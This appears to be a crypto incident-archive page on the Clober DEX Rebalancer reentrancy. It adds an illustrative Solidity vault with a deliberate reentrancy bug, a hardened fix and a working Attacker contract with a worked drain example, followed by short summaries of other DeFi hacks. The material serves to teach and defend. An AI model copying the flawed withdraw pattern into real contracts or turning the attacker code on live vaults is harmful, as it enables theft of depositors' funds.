Clober DEX Rebalancer Reentrancy
A reentrancy in Clober DEX's Rebalancer withdraw path on Base let an attacker re-enter before LP accounting settled, draining $500K in excess liquidity.
An archive of cryptocurrency security incidents — hacks, exploits, bridge failures and rug pulls, documented with on-chain evidence.
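To make the failure mode concrete, the following is an added illustration of the pattern described above, written for this page; it is not Clober's Rebalancer code and nothing about Clober's actual contract layout, token types or callback vector is asserted here. The model is a hypothetical share-based LP vault that holds ETH: its withdraw() settles the caller's shares, pays out, and only then settles the pool-level liquidity figure that prices every share. A re-entrant withdraw issued from inside the payout is therefore priced against stale accounting. The hardened variant moves every effect before the interaction and adds a reentrancy lock.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative pattern only; this is not Clober's Rebalancer code. A share-based
// LP vault that holds ETH: withdraw() settles the caller's shares, pays out,
// and only then settles the pool-level liquidity figure that prices shares.

contract VulnerableVault {
    uint256 public totalShares;
    uint256 public totalLiquidity; // ETH the vault believes it holds
    mapping(address => uint256) public shares;

    function deposit() external payable {
        uint256 minted = (totalShares == 0 || totalLiquidity == 0)
            ? msg.value
            : msg.value * totalShares / totalLiquidity;
        shares[msg.sender] += minted;
        totalShares += minted;
        totalLiquidity += msg.value;
    }

    function withdraw(uint256 shareAmount) external virtual {
        require(shares[msg.sender] >= shareAmount, "insufficient shares");
        uint256 amountOut = shareAmount * totalLiquidity / totalShares;

        // Caller-level accounting is settled before the payout ...
        shares[msg.sender] -= shareAmount;
        totalShares -= shareAmount;

        // ... but pool-level accounting is not. During this call totalShares is
        // already reduced while totalLiquidity is still the old value, so the
        // share price totalLiquidity / totalShares is temporarily inflated.
        (bool ok, ) = msg.sender.call{value: amountOut}("");
        require(ok, "transfer failed");

        totalLiquidity -= amountOut; // BUG: settled only after the external call
    }
}

// Same vault with the withdraw path fixed: checks-effects-interactions plus a
// reentrancy lock, so no state the share price depends on is stale while ETH leaves.
contract HardenedVault is VulnerableVault {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private status = NOT_ENTERED;

    modifier nonReentrant() {
        require(status == NOT_ENTERED, "reentrant call");
        status = ENTERED;
        _;
        status = NOT_ENTERED;
    }

    function withdraw(uint256 shareAmount) external override nonReentrant {
        require(shares[msg.sender] >= shareAmount, "insufficient shares");
        uint256 amountOut = shareAmount * totalLiquidity / totalShares;

        shares[msg.sender] -= shareAmount;  // effects: all three settled first
        totalShares -= shareAmount;
        totalLiquidity -= amountOut;

        (bool ok, ) = msg.sender.call{value: amountOut}(""); // interaction last
        require(ok, "transfer failed");
    }
}

// Hypothetical attacker: deposits, withdraws half, and from inside that payout
// withdraws the other half at the inflated price. With 100 ETH of honest liquidity
// and a 100 ETH attacker deposit, the attacker receives ~116.67 ETH back and the
// honest LP's 100 shares are left backed by ~83.33 ETH.
contract Attacker {
    VulnerableVault public immutable vault;
    bool private reentered;

    constructor(VulnerableVault _vault) { vault = _vault; }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw(vault.shares(address(this)) / 2);
    }

    receive() external payable {
        if (!reentered) {
            reentered = true;
            // Re-entry: totalShares already reduced, totalLiquidity still stale.
            vault.withdraw(vault.shares(address(this)));
        }
    }
}
```

Walking through the numbers: an honest LP deposits 100 ETH (100 shares), the attacker deposits 100 ETH (100 shares, pool now 200/200). The outer withdraw(50) computes 50 ETH out and reduces totalShares to 150 before paying; inside receive(), withdraw(50) prices against 200/150 and pays 66.67 ETH; both payouts are then subtracted, leaving 83.33 ETH behind 100 honest shares. Splitting the re-entry into more, smaller chunks extracts more. Pointed at a HardenedVault (an Attacker can be constructed with one, since it is a subtype of VulnerableVault), the inner withdraw reverts with "reentrant call", receive() reverts, the payout call returns ok == false and the whole attack() transaction reverts.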
$8.7M drained from Polter Finance on Fantom after a flash loan inflated the SpookySwap BOO oracle to $1.37 trillion per token. Polter shut down.
$13.7M drained from UAE-based M2 Exchange hot wallets across BTC, ETH and Solana; the breach was identified and contained, and customer funds restored, within 16 minutes.
Tapioca DAO lost $4.65M after a Discord member was social-engineered into connecting a hardware wallet; attacker seized TAP/USDO ownership. $2.7M recovered.
$53M drained from a 3-of-11 Radiant multi-sig after macOS malware hit three signers; the Safe UI displayed benign transactions while the hardware wallets actually signed contract upgrades.
DPRK-style multi-chain compromise swept $52M from BingX hot wallets across Ethereum, BNB Chain, Avalanche, Optimism and Polygon.
Telegram message oracle flaw let an attacker drain $3M from 11 Banana Gun users via manual transfers on victim wallets. Team refunded victims from treasury.
DeltaPrime lost $6M on Arbitrum after a single private key was extracted; the team ran multi-sig on Avalanche but not Arbitrum. ZachXBT linked it to Lazarus.
~$20M swept from Indonesia's largest crypto exchange across multiple chains in a coordinated hot-wallet compromise during 2024's run of exchange breaches.
~$27M drained from Penpie after a reentrancy gap in Pendle's plugin integration let the attacker register a malicious market and pull pegged rewards in one tx.
A crypto whale lost $55.47M in DAI after signing a malicious transaction on a phishing copy of DeFi Saver's login page powered by Inferno Drainer.
A white-hat MEV bot drained $12M from Ronin's bridge via a dead-code init flaw that left minimumVoteWeight at zero. All funds returned for a $500K bounty.
Attacker extracted $6.4M from Astroport on Terra via an IBC-hooks reentrancy patched in April, then reintroduced in a June upgrade. ASTRO fell 60%.
WazirX lost $234.9M from a 4-of-6 Gnosis Safe at custodian Liminal when attackers exploited a mismatch between the Liminal UI and the calldata signers approved.
$11.6M drained from users who granted infinite approvals to LI.FI; a freshly deployed facet skipped a validation, letting any caller invoke arbitrary contracts.
Malicious PyPI package (bittensor 6.12.2) exfiltrated decrypted coldkeys and stole ~32,000 TAO ($8M); Opentensor firewalled validators in 35 minutes.
~$55M drained from BtcTurk's hot wallets, with Binance freezing roughly $5.3M of the stolen funds mid-flight — Turkey's largest exchange compromise to date.
A flaw in Holograph's operator contract let an attacker mint 1 billion HLG tokens, worth $14.4M nominal at first mint. HLG dropped 80% within nine hours.
UwULend lost $19.4M after an attacker manipulated 5 of 11 sUSDe oracles via Curve swaps, borrowing at $0.99 then liquidating at $1.03. A $3.7M follow-up hit.
$22M (158 BTC, 2,161 ETH, plus LTC/BCH) drained from Lykke in a private-key compromise the UK exchange tried to keep quiet; later attributed to Lazarus.
Velocore's CPMM pools on zkSync and Linea lost $6.8M when a fee-multiplier overflow let the attacker mint huge LP supply against a tiny single-token withdrawal.
DPRK operatives compromised a developer at wallet vendor Ginco via a fake LinkedIn job offer, draining 4,502.9 BTC ($305M) from Japanese exchange DMM Bitcoin.
Attacker took over a dormant MINTER role to mint 5B GALA ($216M), sold $21.8M before being blacklisted; the remaining 4.4B tokens are effectively burned.
DPRK's Lazarus drained $4.3M from ALEX Lab's Stacks cross-chain bridge via a flaw in the bridge's verification logic; attribution came from the on-chain laundering trail.
Sonne Finance lost $20M on Optimism to a 'donation attack', a well-known Compound v2 fork exploit that targets the window between deploying a new market and seeding it with liquidity.
$1.9M drained from Pike Finance after uninitialized upgradeable contracts let an attacker seize ownership and drain CCIP-bridged assets.
ZKasino took 10,515 ETH ($33M) from 8,000+ users on a 1:1 ETH return promise, then converted it to ZKAS and staked on Lido for 15 months. Founder arrested.
Hedgey Finance vesting lost $44.7M when missing parameter validation let the attacker craft campaigns whose claimLockup callback approved arbitrary transfers.
Grand Base, an RWA project on Base, lost $2M after its deployer key was compromised or abused; the attacker minted unlimited GB and drained the liquidity pool.
$11M drained from Prisma Finance's Trove migration helper after the attacker bypassed migrate() and called flashloan() directly, later demanding an apology.
Blast NFT game Munchables lost 17,413 ETH ($62.8M) to one of its developers, a likely North Korean operative hired to write the contract. All funds returned.
Attacker bought a nominal CGT stake, exploited a MakerDAO-fork flaw to amplify voting power, then minted 1B CGT (~$16M) on Curio Governance.
$4.8M drained from Super Sushi Samurai on Blast after a transfer-function bug doubled the sender's balance on self-transfer. A white-hat saw it first.
$2.1M drained from Unizen's DEX aggregator via an unsafe external call introduced in a recent upgrade; the victims were users who had left token approvals to the contract.
WOOFi Swap on Arbitrum lost $8.75M after the attacker realised WOO's Chainlink oracle was never configured and the sPMM accepted any manipulated price.
$6.4M drained from Seneca users via unlimited approvals to its Chamber contract, which had no pause function. Attacker returned 80% for a 20% bounty.
A stolen admin key let the attacker add themselves as a minter and produce 1.79B PLA across two strikes — nominal $290M, only $32M successfully cashed out.
Precision/rounding bug in Abracadabra Money's Cauldron debt-accounting let an attacker drain $6.5M (2,740 ETH + 2.2M MIM) by repaying others' debts.
Orange Finance on Arbitrum lost ~$844K after its admin key was compromised, used to alter strategy contracts and withdraw managed Uniswap v3 positions.
$3.3M drained from Socket/Bungee bridge aggregator users via an unvalidated SocketGateway route that called transferFrom on infinite-approval wallets.
Gamma Strategies on Arbitrum lost $6.1M after a weak deposit-proxy price check let a flash-loan attacker deposit at a skewed ratio and withdraw outsized value.
~$82M drained from Orbit Chain's cross-chain bridge on New Year's Eve after seven of ten multi-sig signers were compromised; losses across Ethereum and Klaytn.